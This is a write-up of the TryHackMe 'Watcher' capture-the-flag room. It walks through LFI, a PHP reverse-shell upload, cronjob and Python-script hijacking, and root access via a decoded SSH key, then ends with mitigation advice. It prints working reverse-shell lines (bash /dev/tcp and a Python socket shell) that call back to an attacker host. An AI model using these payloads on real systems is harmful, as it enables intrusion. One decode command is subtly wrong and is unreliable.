Watcher Write-up

Description

Watcher is a room on TryHackMe. It is a boot2root CTF. It has medium difficulty. In this room you have to collect 7 flags.

Enumeration

First of all we start with basic enumeration. We navigate to the web server on port 80. This web server contains a “robots.txt” file with two entries.

robots.txt

This will give you your first flag. We cannot read the “secret_file_do_not_read.txt” file. But the “post” parameter of the PHP script at “http://10.10.73.152/post.php” is prone to a LFI. We can read the /etc/passwd file with that vulnerability.

LFI vulnerability

Next we can read the secret file with that LFI vulnerability by calling the URL “http://10.10.73.152/post.php?post=secret_file_do_not_read.txt”. The file contains FTP credentials. So now we know that FTP is also running on the target. We can assume that the FTP server is running on the standard port 21.

Reading the secret note

After connecting to the FTP server with ftp 10.10.73.152 we see a directory that is called “files” and a second flag.

FTP server contents

Inside the “files” directory we have write access.

Initial Access

We can now upload a reverse shell into that directory. I have used the reverse shell from Pentestmonkey.

Uploading a reverse shell

Next start a netcat listener with the command nc -lvnp 1234. From the previous note, we know that the FTP directory is located at /home/ftpuser/ftp/. So if we call the URL “http://10.10.73.152/post.php?post=/home/ftpuser/ftp/files/shell.php”, the web server will run the code and we will get a reverse shell.

Getting a reverse shell

Now we are on the machine as www-data user. As www-data user we can read the third flag, which is located at /var/www/html/more_secrets_a9f10a/flag_3.txt.

Reading the third flag

Privilege Escalation

During enumeration we can see that we can run all commands as toby user if we use sudo.

Output of sudo -l

Now we can elevate our privileges to toby by running the command sudo -u toby /bin/bash. After enumerating more, we can spot an interesting cronjob. The script at home/toby/jobs/cow.sh is run as mat user every minute.

Cronjobs

Luckily we have write privileges to that file. This means we can place a reverse shell into that file and elevate our privileges to mat. Write the following two lines into that file. You can use the echo command for this.

#!/bin/bash
bash -i >& /dev/tcp/YOUR_MACHINE_IP/8080 0>&1

Next start a Netcat listener on your machine and wait until the mat user connects to you.

Elevating the privileges to mat

Inside mat’s home folder we can read the fifth flag and find this note.

Reading the note

As you can see we can run the script at /home/mat/scripts/will_script.py as will user. That Python script calls a function from another script called cmd.py.

We have write privileges for the cmd.py file.

So we can craft the following malicious Python script on our attacker machine and replace the original cmd.py by transferring it to the victim.

def get_command(num):
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_MACHINE_IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])


if(num == "1"):
return "ls -lah"
if(num == "2"):
return "id"
if(num == "3"):
return "cat /etc/passwd"

In the next step we will need to run another Netcat listener on port 1234 on our attacker machine. Finally execute the malicious script by running sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py. After that you should get a shell as will user. During enumeration as the will user we can find an interesting file inside /opt/backup. It contains a file called “key.b64”, which has base64 encoded data.

Base64 data

We can copy that file to our machine and decode it. You can use the command echo key.b64 | base64 -d > sshkey. This is a SSH key, which we can use to log in as root. First change the permissions with chmod 600 sshkey. After that log in as root with the command ssh -i sshkey root@10.10.73.152.

Log in as root and read the final flag

Mitigation

First of all a filter should be utilized to fix the LFI vulnerability. Furthermore no secret notes should be accessible through a public web server. Also privileges for files are set wrongly. These privileges should be fixed. It is also recommended that backups should be encrypted.

Passionate about Cyber Security. I am publishing CTF writeups and Cybersec content!